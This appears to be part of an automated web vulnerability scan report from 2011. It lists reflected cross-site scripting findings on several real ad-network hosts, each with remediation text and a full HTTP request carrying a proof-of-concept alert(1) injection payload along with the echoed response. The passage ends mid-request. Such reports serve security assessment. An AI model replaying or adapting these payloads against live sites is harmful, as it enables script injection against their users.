Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
PpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283d3069"-alert(1)-"bcb2ac021ed;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghn
...[SNIP]...

4.61. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb011"-alert(1)-"6b5839ea77b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?&cb011"-alert(1)-"6b5839ea77b=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A582730ED9D3E7ACA7D653A8A640404F; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
TM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?&cb011"-alert(1)-"6b5839ea77b=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt25h32"
};


(function(){var O="3.13.1";var w=(
...[SNIP]...

4.62. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14d92"-alert(1)-"e11a01d09da was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?14d92"-alert(1)-"e11a01d09da HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=969C7D18C17E6CF125DE65C6192D6639; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
NTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?14d92"-alert(1)-"e11a01d09da",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt25h0b"
};


(function(){var O="3.13.1";var w=(ad
...[SNIP]...

4.63. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ba4a"-alert(1)-"51d574e77ee was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D5ba4a"-alert(1)-"51d574e77ee&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F645E89D2DE63B512888E6C0840EEADD; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
jAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D5ba4a"-alert(1)-"51d574e77ee&redir=;ord=1576327943?",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt25gx4"
};


(function(){v
...[SNIP]...

4.64. http://goal.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e6ebd%3balert(1)//7662a95d143 was submitted in the jscallback parameter. This input was echoed as e6ebd;alert(1)//7662a95d143 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20111002235932&cc=us&hk=1&ipid=17560&mh=e4d7a117d40d51c07461e5ec2ec357de&pvm=8a1bde305c8c7fc10d8c64ac123edbc3&pvu=D86A9C320A56454497A101B6CE3CD363&rcc=--&so=0&prf=ll%3A7961%7Cintl%3A15542%7Cadvint%3A15578%7Cadvl%3A15578%7Ctl%3A15579&jscallback=$iTXT.js.callback1e6ebd%3balert(1)//7662a95d143 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Mon, 03 Oct 2011 00:02:09 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1e6ebd;alert(1)//7662a95d143();}catch(e){}

4.65. http://goal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf91d'-alert(1)-'82f479773ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=17560&cf91d'-alert(1)-'82f479773ab=1 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 11466
Date: Mon, 03 Oct 2011 00:00:59 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggin
...[SNIP]...
18'};$iTXT.js.gaPageViewTracker='UA-15687529-23';$iTXT.js.verticalId='21';$iTXT.js.serverUrl='http://goal.us.intellitxt.com';$iTXT.js.serverName='goal.us.intellitxt.com';$iTXT.js.pageQuery='ipid=17560&cf91d'-alert(1)-'82f479773ab=1';$iTXT.js.ipid='17560';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();(function(){var e=document.createElement("img");e.src="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=80000&c
...[SNIP]...

4.66. http://goal.us.intellitxt.com/v4/init [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ce85d%3balert(1)//92071f6f8b5 was submitted in the jscallback parameter. This input was echoed as ce85d;alert(1)//92071f6f8b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1317599965157&pagecl=36717&fv=10&muid=&refurl=http%3A%2F%2Fwww.goal.com%2Fen%2Fnews%2F9%2Fengland%2F2011%2F10%2F01%2F2691360%2Fanderson-confident-manchester-united-will-keep-unbeaten-run&ipid=17560&jscallback=$iTXT.js.callback0ce85d%3balert(1)//92071f6f8b5 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 7509
Date: Mon, 03 Oct 2011 00:02:54 GMT
Age: 0
Connection: keep-alive

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
et('initskip',0);$iTXT.data.Context.params.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');try{$iTXT.js.callback0ce85d;alert(1)//92071f6f8b5({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

4.67. http://goal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75336"-alert(1)-"a0600fbcc40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1317599965157&pagecl=36717&fv=10&muid=&refurl=http%3A%2F%2Fwww.goal.com%2Fen%2Fnews%2F9%2Fengland%2F2011%2F10%2F01%2F2691360%2Fanderson-confident-manchester-united-will-keep-unbeaten-run&ipid=17560&jscallback=$iTXT.js.callback0&75336"-alert(1)-"a0600fbcc40=1 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 7490
Date: Mon, 03 Oct 2011 00:03:04 GMT
Age: 0
Connection: keep-alive

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
17560,"jscallback":"$iTXT.js.callback0","reg":"--","refurl":"http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run","rcc":"--","cc":"us","75336"-alert(1)-"a0600fbcc40":"1"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new $iTXT.data.Param($iTXT.glob.dbgParams,undefined,undefined,'CHANNEL');}$iTXT.glob.params.set
...[SNIP]...

4.68. http://ib.adnxs.com/ab [ccd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the ccd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 971ff'-alert(1)-'79037dbfcc8 was submitted in the ccd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA971ff'-alert(1)-'79037dbfcc8&referrer=http://www.goal.com&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
